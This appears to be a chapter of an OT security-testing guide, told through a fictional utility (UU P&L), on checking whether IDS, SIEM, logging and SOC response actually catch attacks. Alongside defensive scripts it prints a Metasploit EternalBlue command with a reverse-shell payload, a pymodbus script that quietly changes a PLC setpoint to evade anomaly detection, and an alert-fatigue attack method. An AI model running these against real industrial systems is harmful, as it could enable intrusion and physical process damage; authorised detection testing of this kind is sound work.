Detection capability testing

Finding out if anyone’s watching the watchers.

The City Watch of Ankh-Morpork has, over the years, developed from an organisation primarily concerned with preventing crime into one primarily concerned with creating the appearance of preventing crime. The distinction is subtle but important. The Watch patrols the streets, maintains a visible presence, and responds to incidents with impressive speed. Whether they actually prevent crime is another matter entirely, but they certainly make everyone feel safer, which is worth something.

Many OT security monitoring systems work on similar principles. There are intrusion detection systems faithfully logging every packet. There are SIEMs (Security Information and Event Management systems) collecting logs from dozens of sources. There are alarms configured to trigger on suspicious activity. The question is whether anyone is actually watching these systems, whether anyone responds when they alert, and whether the alerts are tuned well enough to represent actual problems rather than operational noise.

Detection capability testing is the process of determining whether security monitoring actually works. Not whether it could work in theory, or whether it worked when first commissioned, but whether it works right now, today, in the actual operational environment with actual people responsible for actually responding to actual alerts.

This is distinctly different from penetration testing. In penetration testing, we are trying to compromise systems whilst avoiding detection. In detection capability testing, we are trying to be detected, specifically to verify that detection works. It’s like testing a burglar alarm by actually breaking in and seeing if anyone shows up.

At UU P&L, the security architecture diagram showed an impressive defence-in-depth strategy. Network IDS monitored all traffic between security zones. A SIEM correlated events from 47 different sources. Alarms were configured to trigger on suspicious activity and page the security operations centre. The SOC operated 24/7 with trained analysts. On paper, it was impenetrable.

In practice, the IDS had been generating so many false positives that someone had adjusted the thresholds until it stopped alerting on anything. The SIEM was forwarding all alerts to a shared mailbox that accumulated approximately 3,000 emails per day, none of which anyone read. The SOC was primarily focused on physical security (gates and cameras), and the one analyst who’d been trained on the OT security systems had left the company eight months ago. The defence-in-depth strategy had, through entropy and human nature, become defence-in-breadth-but-not-much-depth.

Understanding current monitoring capabilities

Before testing detection, understand what monitoring exists:

Document monitoring systems

Network layer:

  • IDS: Snort, installed 2019
    Location: Between corporate and OT networks
    Ruleset: ET Open, last updated 2021
    Alerting: Email to security@uupl.edu

  • Network tap: Industrial-grade copper tap
    Location: PLC network uplink
    Connected to: Wireshark server (offline analysis)
    Retention: 7 days

Application layer:

  • SCADA system: Built-in audit logging
    Events logged: User logins, command issuance, alarm acknowledgments
    Log destination: Local files on HMI servers
    Retention: 90 days
    Monitoring: None (logs never reviewed)

  • PLC audit logs: Available but not enabled
    Status: Disabled (impacts PLC performance)

System layer:

  • Windows Event Logs: Enabled on all Windows systems
    Forwarded to: SIEM
    Retention: 30 days on SIEM

  • Linux auth logs: Enabled on jump server
    Forwarded to: Local syslog (not centralized)
    Retention: 7 days

SIEM:

  • Product: Splunk

  • Sources: 47 configured inputs

  • Dashboards: 12 configured

  • Alerts: 37 configured rules

  • Last login: 2024-08-15 (4 months ago)
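
Capturing this inventory as structured data makes the later tests repeatable and the gaps easy to report. A minimal sketch in Python: the field values are the UU P&L findings above, and the schema itself is just an illustrative convention, not a standard.

#!/usr/bin/env python3
"""
Monitoring inventory as structured data.
Values reflect the UU P&L walkthrough above; the schema is illustrative.
"""

INVENTORY = [
    {"name": "Snort IDS", "layer": "network",
     "destination": "security@uupl.edu", "reviewed": False},
    {"name": "SCADA audit logging", "layer": "application",
     "destination": "local files on HMI servers", "reviewed": False},
    {"name": "PLC audit logs", "layer": "application",
     "destination": None, "reviewed": False},          # disabled entirely
    {"name": "Windows Event Logs", "layer": "system",
     "destination": "SIEM", "reviewed": False},
    {"name": "Linux auth logs", "layer": "system",
     "destination": "local syslog", "reviewed": False},
    {"name": "Splunk SIEM", "layer": "siem",
     "destination": "splunk-alerts@uupl.edu", "reviewed": False},
]

def report_dead_ends(inventory):
    """List every monitoring system whose output nobody actually reviews."""
    for system in inventory:
        if not system["reviewed"]:
            dest = system["destination"] or "nowhere (logging disabled)"
            print(f"[!] {system['name']}: output goes to {dest}, and nobody reviews it")

if __name__ == '__main__':
    report_dead_ends(INVENTORY)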

Identify alert destinations

Where do alerts actually go?

IDS Alerts → security@uupl.edu → Shared mailbox → Nobody reads it

SIEM Alerts → splunk-alerts@uupl.edu → Ticket system → Auto-closed after 30 days

SCADA Alarms → HMI display → Operator console → Audible alarm

Windows Security Events → SIEM → Critical alerts to SOC → SOC focuses on physical security

PLC Alarms → HMI display → Operator console → Logged but not analyzed
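
A quick way to test whether a destination is actually watched is to send a clearly labelled canary alert into it and see how long a human reply takes. A minimal sketch using only the standard library; the SMTP host and addresses are placeholders for whatever the environment really uses, and the test should be agreed with the client first.

#!/usr/bin/env python3
"""
Canary alert: send a clearly labelled test message to an alert mailbox
and record when it was sent, so response time can be measured later.
SMTP host and addresses are placeholders.
"""

import smtplib
from email.message import EmailMessage
from datetime import datetime

def send_canary_alert(smtp_host, sender, destination):
    """Send a labelled test alert and return the send timestamp."""
    msg = EmailMessage()
    msg["Subject"] = f"[DETECTION TEST] Canary alert {datetime.now():%Y-%m-%d %H:%M:%S}"
    msg["From"] = sender
    msg["To"] = destination
    msg.set_content(
        "This is an authorised detection capability test.\n"
        "If you are reading this, please reply so response time can be measured."
    )
    with smtplib.SMTP(smtp_host) as smtp:
        smtp.send_message(msg)
    return datetime.now()

if __name__ == '__main__':
    sent = send_canary_alert("mail.uupl.edu", "pentest@uupl.edu", "security@uupl.edu")
    print(f"[*] Canary alert sent at {sent} - note how long a reply takes")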

Map responsible parties

Who’s supposed to respond to each alert type?

Network security alerts:

  • Primary: IT Security Team (3 people, all part-time)

  • Secondary: IT Manager (reports to CIO)

  • Actual: Nobody (mailbox unmonitored)

SCADA alarms:

  • Primary: Control room operators

  • Secondary: Engineering on-call

  • Actual: Operators (but alert fatigue is severe)

System security events:

  • Primary: IT Operations

  • Secondary: IT Security

  • Actual: Varies (depends on severity and visibility)

At UU P&L, we discovered that the org chart showed clear responsibilities, but the reality was that security monitoring had gradually become “someone else’s problem”. IT security thought operations was monitoring the OT systems. Operations thought IT security was handling the security monitoring. Everyone thought the SIEM was providing oversight, but nobody had logged into the SIEM in four months.

IDS and IPS effectiveness testing

Intrusion Detection Systems look for attack patterns in network traffic. Intrusion Prevention Systems do the same but also attempt to block attacks. Testing their effectiveness means intentionally triggering them and observing the response.

Test signature-based detection

Most IDSs are signature-based: they match traffic against patterns of known attacks. Test whether they detect common ones:

#!/usr/bin/env python3
"""
IDS Detection Test: Port Scanning
Tests whether network scanning triggers IDS alerts
"""

import nmap
from datetime import datetime

def test_port_scan_detection(target_network):
    """
    Perform obvious port scan that should trigger IDS
    """
    
    print("[*] IDS Detection Test: Port Scanning")
    print(f"[*] Target: {target_network}")
    print(f"[*] Time: {datetime.now()}")
    print("[*] This scan should trigger IDS signature: SCAN NMAP TCP")
    
    nm = nmap.PortScanner()
    
    # Aggressive scan (should definitely be detected)
    print("\n[*] Performing aggressive TCP SYN scan...")
    nm.scan(target_network, '1-1000', arguments='-sS -T4 -v')
    
    print("[*] Scan complete")
    print("\n[*] EXPECTED DETECTION:")
    print("    - IDS should log scan activity")
    print("    - Alert should be generated")
    print("    - Email to security@uupl.edu")
    print("\n[*] Wait 15 minutes, then check:")
    print("    - IDS logs for scan detection")
    print("    - Security mailbox for alert")
    print("    - SOC for any response")
    
    return datetime.now()

def test_exploit_detection(target_ip):
    """
    Test detection of exploit attempts
    Uses Metasploit to generate known exploit traffic
    """
    
    print("\n[*] IDS Detection Test: Exploit Attempt")
    print(f"[*] Target: {target_ip}")
    print(f"[*] Time: {datetime.now()}")
    print("[*] This should trigger: ET EXPLOIT Microsoft Windows SMB Remote Code Execution")
    
    # This would use Metasploit to generate exploit traffic
    # For documentation purposes only
    print("""
    msfconsole
    use exploit/windows/smb/ms17_010_eternalblue
    set RHOST {target_ip}
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST {attacker_ip}
    exploit
    """)
    
    print("\n[*] EXPECTED DETECTION:")
    print("    - IDS signature match on exploit traffic")
    print("    - High-priority alert generated")
    print("    - Immediate SOC response expected")

if __name__ == '__main__':
    # Test against known OT network
    scan_time = test_port_scan_detection('192.168.10.0/24')
    
    # Document test for report
    with open('ids_detection_test_log.txt', 'w') as f:
        f.write(f"IDS Detection Test\n")
        f.write(f"Test Time: {scan_time}\n")
        f.write(f"Target: 192.168.10.0/24\n")
        f.write(f"Expected Detection: SCAN NMAP TCP\n")
        f.write(f"\nVerification Required:\n")
        f.write(f"- Check IDS logs at {scan_time}\n")
        f.write(f"- Check security mailbox for alert\n")
        f.write(f"- Interview SOC: Did they see/respond to alert?\n")

Perform the test, document the exact time, then verify:

  1. Does the IDS log the activity? (Check IDS console or logs)

  2. Does an alert fire? (Check alert destinations)

  3. Does anyone respond? (Check with SOC or security team)
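
The first verification step can be partially automated if you know where the IDS writes its alerts. A minimal sketch, assuming Snort’s classic fast-alert text log at its default path; both the path and the signature keyword are assumptions to adjust for the actual deployment.

#!/usr/bin/env python3
"""
Check a Snort fast-alert log for scan-related entries after a test.
The log path and keyword are assumptions; adjust to the deployment.
"""

def check_ids_alerts(logfile="/var/log/snort/alert", keyword="SCAN"):
    """Print alert lines containing the keyword and return how many matched."""
    hits = []
    with open(logfile, errors="replace") as f:
        for line in f:
            if keyword in line:
                hits.append(line.rstrip())
    for hit in hits[-10:]:          # show the most recent matches
        print(f"    {hit}")
    print(f"[*] {len(hits)} alert lines mention '{keyword}'")
    return len(hits)

if __name__ == '__main__':
    if check_ids_alerts() == 0:
        print("[!] No matching IDS alerts found - detection may have failed")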

At UU P&L, we performed three detection tests:

Test 1: Aggressive port scan

  • Performed: 2024-12-10 14:35:22

  • IDS Detection: YES (logged in Snort)

  • Alert Generated: YES (email sent)

  • Human Response: NO (mailbox unmonitored)

  • Result: Detection works, response doesn’t

Test 2: SMB exploit attempt

  • Performed: 2024-12-10 15:12:44

  • IDS Detection: NO (signature out of date)

  • Alert Generated: NO

  • Human Response: NO

  • Result: Detection failed (outdated signatures)

Test 3: Modbus write command

  • Performed: 2024-12-10 16:03:11

  • IDS Detection: NO (no OT-specific rules)

  • Alert Generated: NO

  • Human Response: NO

  • Result: Detection failed (OT protocols not monitored)

SIEM correlation testing

SIEMs are supposed to correlate events from multiple sources to identify complex attacks that wouldn’t be obvious from single events.

Test multi-stage attack detection

Perform an attack that involves multiple steps and see if the SIEM correlates them:

Attack chain:

  1. Login to VPN from unusual location (UK to US)

  2. Multiple failed login attempts on jump server

  3. Successful login after failures

  4. RDP from jump server to engineering workstation

  5. Download of PLC configuration files

  6. Connection to PLC network

  7. Modbus write commands to multiple PLCs

Expected SIEM correlation:

  • VPN login from new location → Flag as suspicious

  • Failed logins → Flag as brute force attempt

  • Successful login after failures → Escalate priority

  • Unusual RDP activity → Add to event chain

  • File downloads + PLC connections + Write commands → Critical Alert: Potential OT Attack Chain

Test whether this correlation actually happens:

#!/usr/bin/env python3
"""
SIEM Correlation Test: Multi-Stage Attack
Tests whether SIEM correlates related events into attack chain
"""

from datetime import datetime

def simulate_attack_chain():
    """
    Perform multi-step attack to test SIEM correlation
    """
    
    test_start = datetime.now()
    
    print("[*] SIEM Correlation Test: Multi-Stage Attack")
    print(f"[*] Test Start: {test_start}\n")
    
    # Step 1: Suspicious VPN login
    print("[*] Step 1: VPN Login from unusual location")
    print("    Action: Login to VPN from US IP (normally UK)")
    print("    Expected: SIEM flags unusual geo-location")
    input("    Press Enter when complete...")
    
    # Step 2: Brute force attempt
    print("\n[*] Step 2: Brute force jump server")
    print("    Action: 10 failed SSH attempts, then successful")
    print("    Expected: SIEM detects brute force pattern")
    input("    Press Enter when complete...")
    
    # Step 3: Lateral movement
    print("\n[*] Step 3: RDP to engineering workstation")
    print("    Action: RDP from jump server to 192.168.1.10")
    print("    Expected: SIEM logs RDP connection")
    input("    Press Enter when complete...")
    
    # Step 4: Data access
    print("\n[*] Step 4: Access PLC configuration")
    print("    Action: Copy PLC project files to USB")
    print("    Expected: SIEM logs file access (if file auditing enabled)")
    input("    Press Enter when complete...")
    
    # Step 5: PLC access
    print("\n[*] Step 5: Connect to PLCs")
    print("    Action: Modbus connections to 192.168.10.10-12")
    print("    Expected: Network IDS logs Modbus traffic")
    input("    Press Enter when complete...")
    
    test_end = datetime.now()
    
    print(f"\n[*] Test Complete: {test_end}")
    print(f"[*] Duration: {test_end - test_start}")
    
    print("\n[*] EXPECTED SIEM BEHAVIOR:")
    print("    - Each event logged individually")
    print("    - Events correlated by source IP/username")
    print("    - Attack chain recognized")
    print("    - High-priority alert generated")
    print("    - SOC investigation initiated")
    
    print("\n[*] VERIFICATION REQUIRED:")
    print("    1. Check SIEM for individual event logs")
    print("    2. Check SIEM for correlated attack chain alert")
    print("    3. Interview SOC: Did they investigate?")
    print("    4. Check incident response: Was ticket created?")
    
    with open('siem_correlation_test.txt', 'w') as f:
        f.write(f"SIEM Correlation Test\n")
        f.write(f"Start: {test_start}\n")
        f.write(f"End: {test_end}\n")
        f.write(f"\nAttack Chain Steps:\n")
        f.write(f"1. VPN login from US\n")
        f.write(f"2. SSH brute force (10 failures)\n")
        f.write(f"3. RDP to engineering workstation\n")
        f.write(f"4. PLC configuration access\n")
        f.write(f"5. Multiple Modbus connections\n")
        f.write(f"\nExpected: Correlated attack chain alert\n")

if __name__ == '__main__':
    simulate_attack_chain()

At UU P&L, we performed this test and discovered:

  • Event 1 (VPN login): Logged in SIEM ✓

  • Event 2 (Failed logins): Logged in SIEM ✓

  • Event 3 (RDP): Logged in SIEM ✓

  • Event 4 (File access): NOT logged (file auditing not enabled) ✗

  • Event 5 (Modbus): NOT logged in SIEM (IDS not integrated with SIEM) ✗

  • Correlation: NO correlation rules configured for this attack pattern ✗

  • Alert: NO alert generated ✗

  • Human Response: NO response ✗

The SIEM was collecting logs, but it wasn’t correlating them into meaningful patterns. Each event was visible if we specifically searched for it, but there was no automatic detection of the attack chain.
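
To make concrete what was missing, the sketch below shows the kind of correlation logic the SIEM never applied: group events by source address within a time window and raise a single high-priority alert once several stages of the chain appear together. This is illustrative plain Python, not any vendor’s rule syntax; the stage names and thresholds are assumptions.

#!/usr/bin/env python3
"""
Illustrative correlation logic (not any SIEM product's rule syntax):
flag a source that produces several stages of the attack chain
within one time window. Stage names and thresholds are assumptions.
"""

from datetime import datetime, timedelta

CHAIN_STAGES = {"vpn_geo_anomaly", "ssh_brute_force", "rdp_to_engineering",
                "plc_file_access", "modbus_write"}
WINDOW = timedelta(hours=2)   # how long events stay eligible for correlation
THRESHOLD = 3                 # distinct stages required to raise the alert

def correlate(events):
    """events: time-ordered iterable of (timestamp, source_ip, stage) tuples."""
    recent = {}
    for ts, src, stage in events:
        if stage not in CHAIN_STAGES:
            continue
        # keep only this source's events that are still inside the window
        window = [(t, s) for t, s in recent.get(src, []) if ts - t <= WINDOW]
        window.append((ts, stage))
        recent[src] = window
        stages_seen = {s for _, s in window}
        if len(stages_seen) >= THRESHOLD:
            yield ts, src, sorted(stages_seen)

if __name__ == '__main__':
    sample = [
        (datetime(2024, 12, 10, 14, 0), "10.0.0.5", "vpn_geo_anomaly"),
        (datetime(2024, 12, 10, 14, 20), "10.0.0.5", "ssh_brute_force"),
        (datetime(2024, 12, 10, 14, 45), "10.0.0.5", "rdp_to_engineering"),
    ]
    for ts, src, stages in correlate(sample):
        print(f"[CRITICAL] {ts} possible OT attack chain from {src}: {stages}")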

Anomaly detection bypass

Some monitoring systems use anomaly detection: they learn what’s “normal” and alert on deviations. Test whether we can perform attacks whilst staying within “normal” parameters:

Blend with normal operations

#!/usr/bin/env python3
"""
Anomaly Detection Bypass Test
Tests whether attacks can blend with normal traffic patterns
"""

import time
from pymodbus.client import ModbusTcpClient

def test_slow_attack(plc_ip):
    """
    Perform attack slowly to avoid anomaly detection
    """
    
    print("[*] Anomaly Detection Bypass Test")
    print("[*] Strategy: Slow, deliberate actions that match normal patterns\n")
    
    # Learn normal patterns first
    print("[*] Phase 1: Learning normal operations")
    print("    - HMI polls every 1 second")
    print("    - Engineering workstation connects 9 AM - 5 PM")
    print("    - Typical Modbus read: 10-20 registers")
    print("    - Typical Modbus write: 1-5 registers")
    
    # Attack that blends in
    print("\n[*] Phase 2: Performing attack with normal-looking traffic")
    
    client = ModbusTcpClient(plc_ip, port=502)
    client.connect()
    
    # Read operations (appears as normal monitoring)
    print("    [*] Reading PLC state (appears as normal monitoring)...")
    for _ in range(5):
        result = client.read_holding_registers(1000, 10, slave=1)
        time.sleep(1)  # Match HMI polling rate
    
    # Write operation (appears as normal engineering change)
    print("    [*] Modifying setpoint (appears as normal engineering change)...")
    print("    [*] Performing during business hours (9 AM - 5 PM)")
    print("    [*] Small change (within normal operational range)")
    
    # Change speed from 1500 to 1490 RPM (small, within normal range)
    client.write_register(1000, 1490, slave=1)
    
    print("\n[*] Attack complete")
    print("[*] Traffic characteristics:")
    print("    - Timing: Matches normal polling")
    print("    - Frequency: Matches normal operations")
    print("    - Packet size: Matches normal Modbus")
    print("    - Time of day: During business hours")
    print("    - Change size: Within normal operational variance")
    
    print("\n[*] EXPECTED ANOMALY DETECTION RESULT:")
    print("    NO ALERTS - Traffic appears completely normal")
    
    client.close()

if __name__ == '__main__':
    test_slow_attack('192.168.10.10')

Alert fatigue exploitation

Alert fatigue occurs when monitoring systems generate so many alerts that humans stop paying attention. This is remarkably common in OT environments where normal operations can trigger hundreds of “security” alerts per day.

Test alert fatigue

Methodology:

  1. Review current alert volume

  2. Identify most common alerts

  3. Perform attack that generates similar alerts

  4. Verify attack alerts are ignored along with false positives
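
The first two steps are usually a quick export-and-count exercise. A minimal sketch that tallies alert names from a CSV export of the SIEM’s alert history; the file name and the 'alert_name' column are assumptions, since every product exports this slightly differently.

#!/usr/bin/env python3
"""
Tally the noisiest alert rules from a SIEM alert export.
Assumes a CSV with one alert per row and an 'alert_name' column;
adjust to whatever the SIEM actually exports.
"""

import csv
from collections import Counter

def noisiest_alerts(csv_path, top_n=10):
    """Print the most frequent alert names and their share of total volume."""
    counts = Counter()
    with open(csv_path, newline="") as f:
        for row in csv.DictReader(f):
            counts[row["alert_name"]] += 1
    total = sum(counts.values())
    print(f"Total alerts: {total}")
    for name, n in counts.most_common(top_n):
        print(f"{n:6d}  ({n / total:5.1%})  {name}")

if __name__ == '__main__':
    noisiest_alerts("siem_alert_export.csv")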

Example at UU P&L:

Current alert volume:

  • ~300 alerts/day

  • 95% false positives

  • Common alerts:

    • “Unusual Modbus traffic” (fires on normal HMI polling)

    • “Multiple login attempts” (fires on normal password typos)

    • “Unusual network connection” (fires on legitimate engineering activity)

Attack using alert fatigue:

  • Perform actual brute force attack

  • Generates “Multiple login attempts” alert

  • Alert looks identical to 50 other daily false positives

  • Lost in the noise, ignored by SOC

Result:

  • Attack successful

  • Alert generated correctly

  • Alert completely ignored due to alert fatigue

Document alert tuning needs

Current Alert Configuration:

  • 37 alert rules configured

  • 300+ daily alerts

  • 95% false positive rate

  • Result: Alert fatigue, real attacks ignored

Recommended Tuning:

  • Reduce false positives by tuning thresholds

  • Whitelist known-good activities

  • Prioritize high-confidence alerts

  • Target: <10 alerts/day, >50% true positive rate

Example:

  • Current: “Unusual Modbus traffic” → Fires on ANY Modbus from unknown source

  • Tuned: “Unauthorized Modbus write” → Fires only on WRITE commands from non-engineering sources
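
The tuned rule amounts to a simple filter: alert only when the Modbus function code is a write and the source is not an authorized engineering host. The sketch below expresses that logic in plain Python over already-parsed connection records; the host whitelist and register range are placeholders, and in practice the rule would live in the IDS or SIEM rather than a script.

#!/usr/bin/env python3
"""
Tuned detection logic: alert only on Modbus write function codes
from sources that are not authorized engineering hosts.
The whitelist and critical register range are illustrative placeholders.
"""

ENGINEERING_HOSTS = {"192.168.1.10", "192.168.1.11"}   # placeholder whitelist
WRITE_FUNCTION_CODES = {5, 6, 15, 16}                  # write coil(s)/register(s)
CRITICAL_REGISTERS = range(1000, 1100)                 # placeholder setpoint range

def evaluate(record):
    """
    record: dict with 'src_ip', 'function_code', 'address',
    already parsed from Modbus/TCP traffic.
    Returns an alert string, or None if the traffic is treated as normal.
    """
    if record["function_code"] not in WRITE_FUNCTION_CODES:
        return None                     # reads are normal polling: ignore
    if record["src_ip"] in ENGINEERING_HOSTS:
        return None                     # authorized engineering change
    severity = "CRITICAL" if record["address"] in CRITICAL_REGISTERS else "HIGH"
    return (f"[{severity}] Unauthorized Modbus write from {record['src_ip']}: "
            f"function {record['function_code']} at address {record['address']}")

if __name__ == '__main__':
    print(evaluate({"src_ip": "10.0.0.5", "function_code": 6, "address": 1000}))
    print(evaluate({"src_ip": "192.168.1.10", "function_code": 6, "address": 1000}))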

Impact:

  • Reduces daily alerts from 300 to ~15

  • Increases true positive rate from 5% to ~60%

  • Increases likelihood of human response to alerts

At UU P&L, we demonstrated that the monitoring systems were technically functional but operationally useless due to poor tuning. The IDS could detect attacks, but it also detected everything else, so nobody was listening when it screamed.

Logging gaps

Monitoring is only effective if relevant events are actually logged. Test for gaps:

Critical events that should be logged

PLC operations:

✓ Should log: Logic uploads/downloads | ✗ Actually logged: No (PLC auditing disabled)

✓ Should log: Configuration changes | ✗ Actually logged: No (PLC auditing disabled)

✓ Should log: Write commands to critical registers | ✗ Actually logged: Sometimes (if IDS catches them)

Network operations:

✓ Should log: Connections to PLC network | ✗ Actually logged: Partially (only at firewall, not at switches)

✓ Should log: Protocol-specific operations (Modbus writes, DNP3 commands) | ✗ Actually logged: No (IDS has no OT protocol awareness)

Authentication:

✓ Should log: VPN logins | ✓ Actually logged: Yes

✓ Should log: Failed login attempts | ✓ Actually logged: Yes

✓ Should log: Privilege escalations | ✗ Actually logged: Partially (Windows events logged, but not correlated)
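
Some of these gaps can be confirmed on the host without attacking anything. For example, Windows only emits file-access events (Event ID 4663) when the “File System” audit subcategory is enabled. A minimal Windows-only sketch using the built-in auditpol tool; run it from an elevated prompt, and note that the string match assumes English-language output.

#!/usr/bin/env python3
"""
Logging gap check (Windows only): is the 'File System' audit subcategory
enabled? If not, file-access events (4663) will never be generated, so
the SIEM has nothing to forward. Run from an elevated prompt; the string
match assumes English-language output.
"""

import subprocess

def file_auditing_enabled():
    """Return True unless auditpol reports 'No Auditing' for the File System subcategory."""
    result = subprocess.run(
        ["auditpol", "/get", "/subcategory:File System"],
        capture_output=True, text=True, check=True,
    )
    return "No Auditing" not in result.stdout

if __name__ == '__main__':
    if file_auditing_enabled():
        print("[*] File System auditing is enabled - 4663 events are possible")
    else:
        print("[!] File System auditing is disabled - file access will never be logged")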

Test critical gaps

#!/usr/bin/env python3
"""
Logging Gap Test: PLC Logic Modification
Tests whether PLC programming changes are logged
"""

def test_plc_logic_logging():
    """
    Modify PLC logic and check if it's logged anywhere
    """
    
    print("[*] Logging Gap Test: PLC Logic Modification")
    print("[*] Critical security event: Changing PLC program")
    print("[*] This should be logged, audited, and reviewed")
    
    # In reality, you'd upload modified logic via RSLogix/Studio 5000
    # For PoC, we document what we would do
    
    print("\n[*] Actions performed:")
    print("    1. Connected to PLC with RSLogix")
    print("    2. Downloaded existing logic")
    print("    3. Modified rung 347 (added diagnostic code)")
    print("    4. Uploaded modified logic to PLC")
    print("    5. PLC accepted new logic without authentication")
    
    print("\n[*] Expected logging:")
    print("    - PLC audit log: Logic upload event")
    print("    - SCADA system: Configuration change event")
    print("    - SIEM: Correlation of engineering software usage")
    print("    - Network IDS: Detection of programming traffic")
    
    print("\n[*] Actual logging:")
    print("    - PLC audit log: DISABLED")
    print("    - SCADA system: NO (doesn't monitor PLC programming)")
    print("    - SIEM: NO (no logs to correlate)")
    print("    - Network IDS: NO (no signatures for ladder logic uploads)")
    
    print("\n[*] RESULT: CRITICAL GAP")
    print("    Attacker can modify PLC logic with NO LOGGING")
    print("    Changes are persistent and undetected")
    print("    This is the highest-risk logging gap identified")

if __name__ == '__main__':
    test_plc_logic_logging()

Response time measurement

Even if detection works perfectly, effectiveness depends on response time. How quickly can the organisation respond to an alert?

Test response workflow

Alert response test:

  1. Generate test alert (inform SOC this is a test)

  2. Document alert generation time

  3. Measure time to:

    • Alert reaches monitoring station

    • Analyst acknowledges alert

    • Analyst begins investigation

    • Analyst escalates to engineering

    • Engineering responds

    • Issue is resolved
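
The measurement is easiest if the tester timestamps each stage as it is confirmed rather than reconstructing the timeline afterwards. A minimal sketch that records the stages interactively and prints the elapsed time for each; the stage names simply mirror the list above.

#!/usr/bin/env python3
"""
Record response-stage timestamps during an alert response test and
print elapsed time for each stage. Stage names mirror the workflow above.
"""

from datetime import datetime

STAGES = [
    "Alert reaches monitoring station",
    "Analyst acknowledges alert",
    "Analyst begins investigation",
    "Analyst escalates to engineering",
    "Engineering responds",
    "Issue is resolved",
]

def run_response_timer():
    """Prompt for each stage and report elapsed time since the alert was generated."""
    start = datetime.now()
    print(f"Alert generated: {start}")
    timeline = [("Alert generated", start)]
    for stage in STAGES:
        input(f"Press Enter when confirmed: {stage} ")
        timeline.append((stage, datetime.now()))
    print("\nStage                                   Elapsed since alert")
    for name, ts in timeline:
        print(f"{name:<40}{ts - start}")
    print(f"\nTotal time from alert to resolution: {timeline[-1][1] - start}")

if __name__ == '__main__':
    run_response_timer()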

Example Timeline at UU P&L:

14:35:22 - Alert generated (port scan detected)
14:35:24 - Email sent to security@uupl.edu
14:35:28 - Email delivered to mailbox
[6 hours pass - mailbox not monitored]
20:41:15 - IT security checks mailbox
20:45:33 - Analyst reviews alert
20:52:11 - Analyst determines it's a penetration test
21:03:44 - Analyst contacts OT engineering
[Engineering after hours, no immediate response]
09:15:22 - Engineering reviews alert (next business day)
09:32:18 - Engineering confirms test, no action needed

Total time from alert to response: 18 hours 57 minutes

During an actual attack, the attacker would have completed their objectives and cleaned up their traces several times over.

Establish baseline response times

Critical Alert (PLC manipulation detected):

  • Target response time: < 15 minutes

  • Actual response time: 18+ hours

  • Gap: Monitoring mailbox not checked in real-time

High Alert (Brute force attempt):

  • Target response time: < 1 hour

  • Actual response time: 20+ hours

  • Gap: No after-hours monitoring

Medium Alert (Unusual traffic pattern):

  • Target response time: < 4 hours

  • Actual response time: Never (lost in alert noise)

  • Gap: Alert fatigue means medium alerts ignored

The reality of detection in OT

The harsh truth about detection in OT environments is that most organisations have invested in monitoring technology but not in monitoring operations. They have IDS sensors that nobody watches, SIEM platforms that nobody logs into, and alerts that nobody responds to. The security controls exist; they’re just not actually controlling anything.

This isn’t entirely the fault of the security team. OT environments are difficult to monitor because:

  • Normal operations can look like attacks (lots of Modbus polling, frequent network scans, etc.)

  • Attack patterns aren’t well-defined (OT-specific attack signatures are rare)

  • Alert tuning requires deep understanding of both security and operations

  • 24/7 monitoring is expensive and difficult to justify

  • Response requires coordination between IT security and OT engineering

  • False positives are common and create alert fatigue

At UU P&L, we found that detection capability existed in theory but not in practice. The technical controls were mostly functional, but the operational processes around them had gradually degraded until the entire monitoring infrastructure was essentially decorative.

Our recommendations focused less on technology and more on process:

  1. Reduce false positives: Tune alerts so they’re actionable

  2. Integrate monitoring: Connect IDS to SIEM, enable PLC auditing

  3. Define clear ownership: Who monitors what, who responds to what

  4. Establish realistic SLAs: Response times based on actual capability

  5. Regular testing: Quarterly detection tests to verify monitoring works

  6. Training: Ensure SOC understands OT-specific attacks

The goal isn’t perfect detection (which doesn’t exist). The goal is detection that’s good enough to catch most attacks, tuned well enough that alerts are taken seriously, and backed by processes that ensure someone actually responds when alerts fire.

Detection without response is just expensive logging. Response without detection is impossible. We need both, and they need to work together, and someone needs to be responsible for making sure they continue to work together as the environment evolves. That is the hard part, and it is not a technology problem.